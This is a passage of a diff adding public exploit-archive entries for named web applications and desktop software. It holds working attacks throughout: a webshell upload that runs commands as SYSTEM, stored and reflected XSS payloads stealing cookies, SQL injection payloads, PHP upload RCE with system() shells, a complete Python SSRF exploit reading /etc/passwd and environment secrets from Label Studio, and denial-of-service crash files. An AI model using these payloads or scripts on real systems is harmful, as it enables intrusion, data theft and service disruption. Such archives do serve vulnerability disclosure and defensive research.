 -----------------------------184982084830387
 Content-Disposition: form-data; name="price"
 1
 -----------------------------184982084830387
 Content-Disposition: form-data; name="product_type"
 1
 -----------------------------184982084830387
 Content-Disposition: form-data; name="brand"
 1
 -----------------------------184982084830387
 Content-Disposition: form-data; name="tags"
 Summet
 -----------------------------184982084830387
 Content-Disposition: form-data; name="submit"
 -----------------------------184982084830387--
 ====================================================================================================
 6. To view the webshell path go to Product List (admin/cosmetics_list.php)
 7. Send the request and visit your new webshell
   Ex:
 http://127.0.0.1/online/product_images/1600959116_shell.php?cmd=whoami
       nt authority\system
 # Vulnerability Type: stored Cross-Site Scripting (XSS) - #1
 CVSS v3: 6.5
 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
 CWE: CWE-79
 Vulnerability description: Online shopping system advanced v1.0, does not
 sufficiently encode user-controlled inputs, resulting in a stored
 Cross-Site Scripting (XSS) vulnerability via the admin/edit_user.php, in
 multiple parameter.
 Proof of concept:
 Stored:
 POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
 Gecko/20100101 Firefox/70.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
 Content-Type: multipart/form-data;
 boundary=---------------------------120411781422335
 Content-Length: 496
 Origin: http://127.0.0.1
 Connection: keep-alive
 Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
 Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
 Upgrade-Insecure-Requests: 1
 Host: 127.0.0.1
 -----------------------------120411781422335
 Content-Disposition: form-data; name="user_id"
 25
 -----------------------------120411781422335
 Content-Disposition: form-data; name="email"
 otheruser@gmail.com
 -----------------------------120411781422335
 Content-Disposition: form-data; name="password"
 </td><script>alert(1);</script><td>
 -----------------------------120411781422335
 Content-Disposition: form-data; name="btn_save"
 -----------------------------120411781422335--
 # Vulnerability Type: stored Cross-Site Scripting (XSS) - #2
 CVSS v3: 6.5
 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
 CWE: CWE-79
 Vulnerability description: Online shopping system advanced v1.0, does not
 sufficiently encode user-controlled inputs, resulting in a stored
 Cross-Site Scripting (XSS) vulnerability via the admin/add_user.php, in
 multiple parameter.
 Proof of concept:
 Stored:
 POST http://127.0.0.1/online/admin/add_user.php HTTP/1.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
 Gecko/20100101 Firefox/70.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 192
 Origin: http://127.0.0.1
 Connection: keep-alive
 Referer: http://127.0.0.1/online/admin/add_user.php
 Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
 Upgrade-Insecure-Requests: 1
 Host: 127.0.0.1
 first_name=demo&last_name=demo&email=demo%40localhost.inet&user_password=demo&mobile=5555555555&address1=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E&address2=here+5&btn_save=
 # Vulnerability Type: reflected Cross-Site Scripting (XSS) - #1
 CVSS v3: 6.1
 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
 CWE: CWE-79
 Vulnerability description: Online shopping system advanced v1.0, does not
 sufficiently encode user-controlled inputs, resulting in a reflected
 Cross-Site Scripting (XSS) vulnerability via the admin/clothes_list.php, in
 page parameter.
 Proof of concept:
 Reflected:
 http://127.0.0.1/online/admin/clothes_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E
 # Vulnerability Type: reflected Cross-Site Scripting (XSS) - #2
 CVSS v3: 6.1
 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
 CWE: CWE-79
 Vulnerability description: Online shopping system advanced v1.0, does not
 sufficiently encode user-controlled inputs, resulting in a reflected
 Cross-Site Scripting (XSS) vulnerability via the admin/cosmetics_list.php,
 in page parameter.
 Proof of concept:
 Reflected:
 http://127.0.0.1/online/admin/cosmetics_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E
--- a/exploits/php/webapps/51104.txt
+++ b/exploits/php/webapps/51104.txt
@ -0,0 +1,13 @@
 # Exploit Title: Jetpack 11.4 - Cross Site Scripting (XSS)
 # Date: 2022-10-19
 # Author: Behrouz Mansoori
 # Software Link: https://wordpress.org/plugins/jetpack
 # Version: 11.4
 # Tested on: Mac m1
 # CVE: N/A
 1. Description:
 This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
 2. Proof of Concept:
 http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert(document.cookie)</script>
--- a/exploits/php/webapps/51108.txt
+++ b/exploits/php/webapps/51108.txt
@ -0,0 +1,34 @@
 # Exploit Title: BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)
 # Date: 2022-09-18
 # Exploit Author: zetc0de
 # Vendor Homepage: https://www.boxbilling.org/
 # Software Link:
 https://github.com/boxbilling/boxbilling/releases/download/4.22.1.5/BoxBilling.zip
 # Version: <=4.22.1.5 (Latest)
 # Tested on: Windows 10
 # CVE : CVE-2022-3552
 # BoxBilling was vulnerable to Unrestricted File Upload.
 # In order to exploit the vulnerability, an attacker must have a valid
 authenticated session as admin on the CMS.
 # With at least 1 order of product an attacker can upload malicious file to
 hidden API endpoint that contain a webshell and get RCE
 ###################################################################################
 ## POC
 POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1
 Host: local.com:8089
 Content-Length: 52
 Accept: application/json, text/javascript, */*; q=0.01
 DNT: 1
 X-Requested-With: XMLHttpRequest
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
 Content-Type: application/x-www-form-urlencoded
 Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d
 Connection: close
 order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f>
 POC Video :
 https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing
--- a/exploits/php/webapps/51110.txt
+++ b/exploits/php/webapps/51110.txt
@ -0,0 +1,17 @@
 # Exploit Title: Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)
 # Date: 2022-08-10
 # Exploit Author: Sinem Şahin
 # Vendor Homepage: https://intelliants.com/
 # Version: 4.2.1
 # Tested on: Windows & XAMPP
 ==> Tutorial <==
 1- Go to the following url. => http://(HOST)/panel/fields/add
 2- Write XSS Payload into the tooltip value of the field add page.
 3- Press "Save" button.
 4- Go to the following url. => http://(HOST)/panel/members/add
 XSS Payload ==> "<script>alert("field_tooltip_XSS")</script>
 Reference: ://github.com/intelliants/subrion/issues/895
--- a/exploits/php/webapps/51115.txt
+++ b/exploits/php/webapps/51115.txt
@ -0,0 +1,27 @@
 # Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting (XSS)
 # Date: 26/10/2022
 # Exploit Author: Saud Alenazi
 # Vendor Homepage: https://moodle.org/
 # Software Link: https://git.in.moodle.com/moodle
 # Version: 4.0
 # Tested on: XAMPP, Windows 10
 # Contact: https://twitter.com/dmaral3noz
 Description:
 A Cross Site Scripting (XSS) vulnerability exists in Moodle is a free and open-source Learning Management System (LMS) written in PHP and distributed under the GNU General Public License
 Vulnerable Code:
 line 111 in file "course/search.php"
 echo $courserenderer->search_courses($searchcriteria);
 Steps to exploit:
 1) Go to http://localhost/course/search.php
 2) Insert your payload in the "search"
 Proof of concept (Poc):
 The following payload will allow you to run the javascript -
 "><img src=# onerror=alert(document.cookie)>
--- a/exploits/php/webapps/51116.txt
+++ b/exploits/php/webapps/51116.txt
@ -0,0 +1,53 @@
 ## Title: Social-Share-Buttons v2.2.3 - SQL Injection
 ## Author: nu11secur1ty
 ## Date: 09.16.2022
 ## Vendor: https://wordpress.org/
 ## Software: https://downloads.wordpress.org/plugin/social-share-buttons-by-supsystic.2.2.3.zip
 ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3
 ## Description:
 The `project_id` parameter from the Social Share Buttons-2.2.3 on the
 WordPress-6.0.2 system appears to be vulnerable to SQL injection
 attacks.
 The malicious user can dump-steal the database, from this system and
 he can use it for very malicious purposes.
 WARNING: The attacker can retrieve all-database from this system!
 NOTE: The users of this system are NOT protected, this SQL
 vulnerability is CRITICAL!
 STATUS: HIGH Vulnerability
 [+]Payload:
 ```mysql
 ---
 Parameter: project_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=social-sharing-share&project_id=378116348' or
 '3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id=
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=social-sharing-share&project_id=378116348' or
 '3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND
 'KWbC'='KWbC&network_id=5&post_id=
 ---
 ```
 ## Reproduce:
 [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3)
 ## Proof and Exploit:
 [href](https://streamable.com/m9r76w)
 --
 System Administrator - Infrastructure Engineer
 Penetration Testing Engineer
 Exploit developer at https://packetstormsecurity.com/
 https://cve.mitre.org/index.html and https://www.exploit-db.com/
 home page: https://www.nu11secur1ty.com/
 hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
--- a/exploits/php/webapps/51119.txt
+++ b/exploits/php/webapps/51119.txt
@ -0,0 +1,41 @@
 # Exploit Title: iBooking v1.0.8 - Arbitrary File Upload
 # Exploit Author: d1z1n370/oPty
 # Date: 01/11/2022
 # Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088
 # Tested on: Linux
 # Version: 1.0.8
 # Exploit Description:
 The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
 # PoC request
 POST https://localhost/dashboard/upload-new-media HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: https://localhost/dashboard/settings
 X-Requested-With: XMLHttpRequest
 Content-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062
 Content-Length: 449
 Connection: close
 Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
 -----------------------------115904534120015298741783774062
 Content-Disposition: form-data; name="_token"
 kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW
 -----------------------------115904534120015298741783774062
 Content-Disposition: form-data; name="is_modal"
 1
 -----------------------------115904534120015298741783774062
 Content-Disposition: form-data; name="file"; filename="upload.php56"
 Content-Type: image/gif
 GIF89a;
 <?php system($_GET['a']); phpinfo(); ?>
 -----------------------------115904534120015298741783774062--
--- a/exploits/php/webapps/51120.txt
+++ b/exploits/php/webapps/51120.txt
@ -0,0 +1,63 @@
 ## Title: Senayan Library Management System v9.5.0 - SQL Injection
 ## Author: nu11secur1ty
 ## Date: 11.03.2022
 ## Vendor: https://slims.web.id/web/
 ## Software: https://github.com/slims/slims9_bulian/releases
 ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0
 ## Description:
 The `keywords` parameter appears to be vulnerable to SQL injection attacks.
 A single quote was submitted in the keywords parameter, and a general
 error message was returned.
 Two single quotes were then submitted and the error message
 disappeared. The injection is confirmed manually from nu11secur1ty.
 The attacker can retrieve all information from the database of this
 system, by using this vulnerability.
 ## STATUS: HIGH Vulnerability
 [+] Payload:
 ```MySQL
 ---
 Parameter: keywords (GET)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT
 SLEEP(5)#
    Type: time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)
    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))
 RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#
 ---
 ```
 ## Reproduce:
 [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0)
 ## Proof and Exploit:
 [href](https://streamable.com/63og5v)
 ## Time spent
 `3:00`
 System Administrator - Infrastructure Engineer
 Penetration Testing Engineer
 Exploit developer at
 https://packetstormsecurity.com/https://cve.mitre.org/index.html and
 https://www.exploit-db.com/
 home page: https://www.nu11secur1ty.com/
 hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
 --
 System Administrator - Infrastructure Engineer
 Penetration Testing Engineer
 Exploit developer at https://packetstormsecurity.com/
 https://cve.mitre.org/index.html and https://www.exploit-db.com/
 home page: https://www.nu11secur1ty.com/
 hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
--- a/exploits/php/webapps/51121.txt
+++ b/exploits/php/webapps/51121.txt
@ -0,0 +1,67 @@
 ## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS)
 ## Author: nu11secur1ty
 ## Date: 11.03.2022
 ## Vendor: https://www.rukovoditel.net/
 ## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download
 ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1
 ## Description:
 The application is vulnerable to DOM-based cross-site scripting
 attacks. Data is read from `location.hash` and passed to
 `jQuery.parseHTML`.
 The attacker can use this vulnerability to create an unlimited number
 of accounts on this system until it crashed.
 ## STATUS: HIGH Vulnerability - CRITICAL
 [+] Payload:
 ```POST
 GET /rukovoditel/index.php?module=users/restore_password HTTP/1.1
 Host: pwnedhost.com
 Accept-Encoding: gzip, deflate
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
 Accept-Language: en-US;q=0.9,en;q=0.8
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63
 Safari/537.36
 Connection: close
 Cache-Control: max-age=0
 Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg;
 cookie_test=please_accept_for_session;
 app_login_redirect_to=module%3Ddashboard%2F
 Upgrade-Insecure-Requests: 1
 Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/login
 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
 Sec-CH-UA-Platform: Windows
 Sec-CH-UA-Mobile: ?0
 ```
 ## Reproduce:
 [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1)
 ## Proof and Exploit:
 [href](https://streamable.com/i1qmfk)
 ## Time spent
 `3:45`
 System Administrator - Infrastructure Engineer
 Penetration Testing Engineer
 Exploit developer at
 https://packetstormsecurity.com/https://cve.mitre.org/index.html and
 https://www.exploit-db.com/
 home page: https://www.nu11secur1ty.com/
 hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
 --
 System Administrator - Infrastructure Engineer
 Penetration Testing Engineer
 Exploit developer at https://packetstormsecurity.com/
 https://cve.mitre.org/index.html and https://www.exploit-db.com/
 home page: https://www.nu11secur1ty.com/
 hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
--- a/exploits/python/webapps/51109.txt
+++ b/exploits/python/webapps/51109.txt
@ -0,0 +1,196 @@
 # Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)
 # Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition"
 # Date: 2022-10-03
 # Exploit Author: @DeveloperNinja, IncisiveSec@protonmail.com
 # Vendor Homepage: https://github.com/heartexlabs/label-studio, https://labelstud.io/
 # Software Link: https://github.com/heartexlabs/label-studio/releases
 # Version: <=1.5.0
 # CVE : CVE-2022-36551
 # Docker Container: heartexlabs/label-studio
 # Server Side Request Forgery (SSRF) in the Data Import module in Heartex - Label Studio Community Edition
 # versions 1.5.0 and earlier allows an authenticated user to access arbitrary files on the system.
 # Furthermore, self-registration is enabled by default in these versions of Label Studio enabling a remote
 # attacker to create a new account and then exploit the SSRF.
 #
 # This exploit has been tested on Label Studio 1.5.0
 #
 # Exploit Usage Examples (replace with your target details):
 # - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /etc/passwd
 # - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /proc/self/environ
 # - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /label-studio/data/label_studio.sqlite3 --out label_studio.sqlite3.sqlite3
 import json
 import argparse
 import requests
 import shutil
 from urllib.parse import urljoin
 from urllib.parse import urlparse
 requests.packages.urllib3.disable_warnings()
 # main function for exploit
 def main(url, filePath, writePath, username, password, shouldRegister):
    # check if the URL is reachable
    try:
        r = requests.get(url, verify=False)
        if r.status_code == 200:
            print("[+] URL is reachable")
        else:
            print("[!] Error: URL is not reachable, check the URL and try again")
            exit(1)
    except requests.exceptions.RequestException as e:
        print("[!] Error: URL is not reachable, check the URL and try again")
        exit(1)
    session = requests.Session()
    login(session, url, username, password, shouldRegister)
    print("[+] Logged in")
    print("[+] Creating project...")
    # Create a temp project
    projectDetails = create_project(session, url)
    print("[+] Project created, ID: {}".format(projectDetails["id"]))
    #time for the actual exploit, import a "file" to the newly created project (IE: file:///etc/passwd, or file:///proc/self/environ)
    print("[+] Attempting to fetch: {}".format(filePath))
    fetch_file(session, url, projectDetails["id"], filePath, writePath)
    print("[+] Deleting Project.. {}".format(projectDetails["id"]))
    delete_project(session, url, projectDetails["id"])
    print("[+] Project Deleted")
    print("[*] Finished executing exploit")
 # login, logs the user in
 def login(session, url, username, password, shouldRegister):
    # hit the main page first to get the CSRF token set
    r = session.get(url, verify=False)
    r = session.post(
        urljoin(url, "/user/login"),
        data={
            "email": username,
            "password": password,
            "csrfmiddlewaretoken": session.cookies["csrftoken"],
        },
        verify=False
    )
    if r.status_code == 200 and r.text.find("The email and password you entered") < 0:
        return
    elif r.text.find("The email and password you entered") > 0 and shouldRegister:
        print("[!] Account does not exist, registering...")
        r = session.post(
            urljoin(url, "/user/signup/"),
            data={
                "email": username,
                "password": password,
                "csrfmiddlewaretoken": session.cookies["csrftoken"],
                'allow_newsletters': False,
            },
        )
        if r.status_code == 302:
            # at this point the system automatically logs you in (assuming self-registration is enabled, which it is by default)
            return
    else:
        print("[!] Error: Could not login, check the credentials and try again")
        exit(1)
 # create_project creates a temporary project for exploiting the SSRF
 def create_project(session, url):
    r = session.post(
        urljoin(url, "/api/projects"),
        data={
            "title": "TPS Report Finder",
        },
        verify=False
    )
    if r.status_code == 200 or r.status_code == 201:
        return r.json()
    else:
        print("[!] Error: Could not create project, check your credentials / permissions")
        exit(1)
 def fetch_file(session, url, projectId, filePath, writePath):
    # if scheme is empty prepend file://
    parsedFilePath = urlparse(filePath)
    if parsedFilePath.scheme == "":
        filePath = "file://" + filePath
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    url = urljoin(url, "/api/projects/{}/import".format(projectId))
    r = session.post(url,
        data={
            "url": filePath, # This is the main vulnerability, there is no restriction on the "schema" of the provided URL
        },
        headers=headers,
        verify=False
    )
    if r.status_code == 201:
        # file found! -- first grab the file path details
        fileId = r.json()["file_upload_ids"][0]
        r = session.get(urljoin(url, "/api/import/file-upload/{}".format(fileId)), headers=headers, verify=False)
        r = session.get(urljoin(url, "/data/{}".format(r.json()["file"])), headers=headers, verify=False, stream=True)
        print("[+] File found!")
        # if user wants to write to disk, make it so
        if writePath != None:
            print("[+] Writing to {}".format(writePath))
            # write the file to disk
            with open(writePath, 'wb') as handle:
                shutil.copyfileobj(r.raw, handle)
                handle.close()
            return
        else:
            print("==========================================================")
            print(r.text)
            print("==========================================================")
            return
    else:
        print("[!] Error: Could not fetch file, it's likely the file path doesn't exist: ")
        print("\t" + r.json()["validation_errors"]["non_field_errors"][0])
        return
 def delete_project(session, url, projectId):
    url = urljoin(url, "/api/projects/{}".format(projectId))
    r = session.delete(url, verify=False)
    if r.status_code == 200 or r.status_code == 204:
        return
    else:
        print( "[!] Error: Could not delete project, check your credentials / permissions")
        exit(1)
 parser = argparse.ArgumentParser()
 parser.add_argument("--url", required=True, help="Label Studio URL")
 parser.add_argument("--file", required=True, help="Path to the file you want to fetch")
 parser.add_argument("--out", required=False, help="Path to write the file.  If omitted will be written to STDOUT")
 parser.add_argument("--username", required=False, help="Username for existing account (email)")
 parser.add_argument("--password", required=False, help="Password for existing account")
 parser.add_argument("--register", required=False, action=argparse.BooleanOptionalAction, help="Register user if it doesn't exist",
 )
 args = parser.parse_args()
 main(args.url, args.file, args.out, args.username, args.password, args.register)
--- a/exploits/windows/dos/51100.txt
+++ b/exploits/windows/dos/51100.txt
@ -0,0 +1,127 @@
 #Title: VMware Workstation 15 Pro - Denial of Service
 #Author: Milad Karimi
 #Date: 2022-10-17
 #Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 15 Pro (15.5.6 build-16341506)
 #Affected: VMware Workstation Pro/Player 15.x
 config.version = "8"
 virtualHW.version = "4"
 displayName = "credit's to Ex3ptionaL for find this vouln"
 annotation = "Live CD ISO http://www.irongeek.com"
 guestinfo.vmware.product.long = "credit's to Ex3ptionaL for find this vouln"
 guestinfo.vmware.product.url = "http://www.millw0rm.com"
 guestinfo.vmware.product.short = "LCDI"
 guestinfo.vmware.product.version.major = "1"
 guestinfo.vmware.product.version.minor = "0"
 guestinfo.vmware.product.version.revision = "0"
 guestinfo.vmware.product.version.type = "release"
 guestinfo.vmware.product.class = "virtual machine"
 guestinfo.vmware.product.build = "1.0.0rc8-20051212"
 uuid.action = "create"
 guestOS = "winxppro"
 #####
 # Memory
 #####
 memsize = "20000000000000"
 # memsize = "300000000000000000000000000000"
 # memsize = "400000000000000000000"
 # memsize = "700000000000000000000000000000000000"
 #
 # Alternative larger memory allocations
 #####
 # USB
 #####
 usb.present = "TRUE"
 #####
 # Floppy
 #####
 floppy0.present = "FALSE"
 #####
 # IDE Storage
 #####
 ide1:0.present = "TRUE"
 #Edit line below to change ISO to boot from
 ide1:0.fileName = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.iso"
 ide1:0.deviceType = "cdrom-image"
 ide1:0.startConnected = "TRUE"
 ide1:0.autodetect = "TRUE"
 #####
 # Network
 #####
 ethernet0.present = "TRUE"
 ethernet0.connectionType = "nat"
 # ethernet0.connectionType = "bridged"
 #
 # Switch these two to enable "Bridged" vs. "NAT"
 #####
 # Sound
 #####
 sound.present = "TRUE"
 sound.virtualDev = "es1371"
 sound.autoDetect = "TRUE"
 sound.fileName = "-1"
 #####
 # Misc.
 #
 # (normal)  high
 priority.grabbed = "high"
 tools.syncTime = "TRUE"
 workingDir = "."
 #
 # (16)  32  64
 sched.mem.pShare.checkRate = "32"
 #
 # (32)  64  128
 sched.mem.pshare.scanRate = "64"
 #
 # Higher resolution lockout, adjust values to exceed 800x600
 svga.maxWidth = "8000000000000000000"
 svga.maxHeight = "6000000000000000000"
 #
 # (F) T
 isolation.tools.dnd.disable = "FALSE"
 #
 # (F) T
 isolation.tools.hgfs.disable = "FALSE"
 #
 # (F) T
 isolation.tools.copy.disable = "FALSE"
 #
 # (F) T
 isolation.tools.paste.disable = "FALSE"
 #
 # (T) F
 logging = "TRUE"
 #
 #
 # (F) T
 log.append = "FALSE"
 #
 # (3) number of older files kept
 log.keepOld = "1"
 #
 # (0) microseconds
 keyboard.typematicMinDelay = 100000000000000000
 uuid.location = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
 uuid.bios = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
 ethernet0.addressType = "generated"
 ethernet0.generatedAddress = "00:0c:29:3c:d4:4a"
 ethernet0.generatedAddressOffset = "0"
 checkpoint.vmState = "live-cd-iso.vmss"
 tools.remindInstall = "TRUE"
 Exploit code()
 buffer = "A" * 118000000000000000
 payload = buffer
 try:
     f=open("PoC.vmx","w")
     print "[+] Creating %s evil payload.." %len(payload)
     f.write(payload)
     f.close()
     print "[+] File created!"
 except:
     print "File cannot be created"
--- a/exploits/windows/dos/51102.txt
+++ b/exploits/windows/dos/51102.txt
@ -0,0 +1,62 @@
 # Exploit Title:  SuperMailer v11.20 - Buffer overflow DoS
 # Exploit Author: Rafael Pedrero
 # Discovery Date: 2021-02-07
 # Vendor Homepage:
 https://int.supermailer.de/download_newsletter_software.htm
 # Software Link : https://int.supermailer.de/smintsw.zip /
 https://int.supermailer.de/smintsw_x64.zip
 # Tested Version: v11.20 32bit/64bit [11.20.0.2204]
 # Tested on:  Windows 7, 10
 CVSS v3: 3.3
 CVSS vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
 CWE: CWE-20
 Vulnerability description: A vulnerability in Newsletter Software
 SuperMailer v11.20 32bit/64bit [11.20.0.2204] could allow an attacker to
 cause a process crash resulting in a Denial of service (DoS) condition for
 the application on an affected system. The vulnerability exists due to
 insufficient validation of certain elements with a configuration file
 malformed. An attacker could exploit this vulnerability by sending a user a
 malicious SMB (configuration file) file through a link or email attachment
 and persuading the user to open the file with the affected software on the
 local system. A successful exploit could allow the attacker to cause the
 application to crash when trying to load the malicious file.
 Proof of concept:
 1.- Go to File -> Save program options...
 2.- Save the file (default extension *.smb)
 3.- Edit file and you introduce a lot of A in somewhere. Example: DoS.smb
 file
 Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
 00000000  10 03 00 00 00 00 00 00 A9 E5 7E 41 41 41 41 41  ........©å~AAAAA
 00000010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 00000020  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 00000030  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 00000040  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 00000050  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 00000060  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 00000070  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 00000080  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 00000090  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 000000A0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 000000B0  41 41 97 99 E5 40 00 00 00 00 00 00 00 00 00 00  AA—™å@..........
 000000C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
 000000D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
 000000E0  00 00 00 00 00 00 6B 00 00 00 53 00 6F 00 66 00  ......k...S.o.f.
 000000F0  74 00 77 00 61 00 72 00 65 00 5C 00 4D 00 69 00  t.w.a.r.e.\.M.i.
 00000100  72 00 6B 00 6F 00 20 00 42 00 6F 00 65 00 65 00  r.k.o. .B.o.e.e.
 00000110  72 00 20 00 53 00 6F 00 66 00 74 00 77 00 61 00  r. .S.o.f.t.w.a.
 00000120  72 00 65 00 5C 00 53 00 75 00 70 00 65 00 72 00  r.e.\.S.u.p.e.r.
 00000130  4D 00 61 00 69 00 6C 00 65 00 72 00 5C 00 54 00  M.a.i.l.e.r.\.T.
 00000140  65 00 73 00 74 00 20 00 45 00 4D 00 61 00 69 00  e.s.t. .E.M.a.i.
